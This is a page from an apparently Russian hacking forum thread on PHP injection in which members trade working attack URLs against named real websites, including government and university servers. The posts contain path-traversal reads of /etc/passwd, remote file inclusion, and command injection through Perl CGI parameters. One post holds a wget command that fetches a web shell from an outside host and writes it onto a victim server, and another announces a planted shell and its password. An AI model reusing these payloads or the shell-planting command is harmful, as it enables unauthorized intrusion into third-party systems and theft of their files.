PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    pr 4
    http://www.fonprevial.org.co/download.php?file=../../../../../../../../../../../etc/passwd

    тупое читалко
    https://secure4.olemiss.edu/umpolicyopen/GetPdfActive?pol=10967301&ver=active&file=../../../../../../../../../../../etc/passwd%00.pdf
     
  2. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

    можно передвигаться по всему компу ...
    PS:Сайт в локалке,но можно в него и с инета зайти
    Это похоже не PHP инъекцмя
     
  3. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Все в открытую)
     
    2 people like this.
  4. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    http://www.grammi.edu.gr/gr/index.php?page=[ url ]
    это не инекция
    оно просто вставляет во фрейм
     
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    gov, pr9
    gov, pr7
     
    #745 aka PSIH, 16 Jul 2008
    Last edited: 16 Jul 2008
    4 people like this.
  6. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    http://zwgkml.harbin.gov.cn/hrb_zwgkml/file.php?filename=../../../../../../../../../../../etc/passwd
    Читалко
    http://www.factordinero.com.co/docs/download.php?file=download.php
     
    1 person likes this.
  7. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.uaemet.gov.ae/upload/filedownload_backend.php?file=../../../../../../../../../../../etc/passwd
    Code:
    http://www.telcat-starclub.de/cgi-bin/parse.pl?file=../../../../../../../../../../../etc/passwd
    Code:
    http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
     
  8. none222

    none222 Guest

    Reputations:
    0
    liveinternet.ru
    Po vsem priznakam est' includ, jal' 4to nastroika servera ne pozvolaet vospol'zovat's9 dannoj bagoj
    http://www.liveinternet.ru/stat/index.html?lang=./././en
     
    1 person likes this.
  9. none222

    none222 Guest

    Reputations:
    0
    ну вот смотри:

    пишем:
    http://www.liveinternet.ru/stat/index.html?lang=./././en
    и видим вверху справа:
    вверху слева:

    на английском языке.


    теперь пишем так:
    http://www.liveinternet.ru/stat/index.html?lang=./././en./././

    это на случай, если ./ вырезается.
    Видим. что язык стал русским - значит - по дефолту - произошла ошибка.

    Если пишешь ./././ до имени (ну типа точка - текущий каталог) - ошибки нет


    пишем:

    http://www.liveinternet.ru/stat/index.html?lang=./././es

    и язык испанский.

    А эксплуатировать не удастся потому, что нуль-байт фильтруется, а в конце есть приставка. И в начале тоже. То есть есть возможность подключать (или читать) файлы с тем расширением, с каким и файлы с языками
     
  10. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    "Работница" - журнал для семейного чтения


    Уязвимый код в файле part.php:
    PHP:
    include($rubr.".php");
    Использование:
     
  11. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Code:
    http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
    http://www.o3on.com/cgi-bin/use.pl?content=|id|
    Я хз че за юзер но wget, curl и прочая дребедень... Там просто их нет. Ошибки при неправильном использовании wget не выдаются. Шелл на перл не залить. Однако файлы читаются отменно
     
  12. Redyps

    Redyps Banned

    Joined:
    17 Jul 2008
    Messages:
    11
    Likes Received:
    10
    Reputations:
    5
    да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
    http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
    тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
    http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|
     
  13. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
    вот так работает
     
  14. Redyps

    Redyps Banned

    Joined:
    17 Jul 2008
    Messages:
    11
    Likes Received:
    10
    Reputations:
    5
    http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
    шелл найдёте =)
     
    1 person likes this.
  15. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    вроде бы локальный инклуд
    PHP:
    http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00
    PHP:
    http://svpu-profi.lg.ua/page.php?page=[инклуд]
     
    #755 ..::TROYAN::.., 3 Aug 2008
    Last edited: 3 Aug 2008
  16. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,191
    Reputations:
    430
    _http://www.o3on.com/cgi-bin/use.pl
    Шелл. Пароль r57
    Ойойёй... бл*ть... юзе.пл переписал... ну и *** с ним...
     
    #756 Ch3ck, 4 Aug 2008
    Last edited: 4 Aug 2008
    3 people like this.
  17. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Ищи проблему в самом шелле
    http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
    Иньекция рабоатет
     
  18. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    BanQui
     
  19. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    BanQui
    шелл нормальный, это ты криворукий... ;)
    + там safe-mode ON
     
  20. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
    http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
    http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
    http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd
     
    #760 .Striker, 8 Aug 2008
    Last edited: 8 Aug 2008
    2 people like this.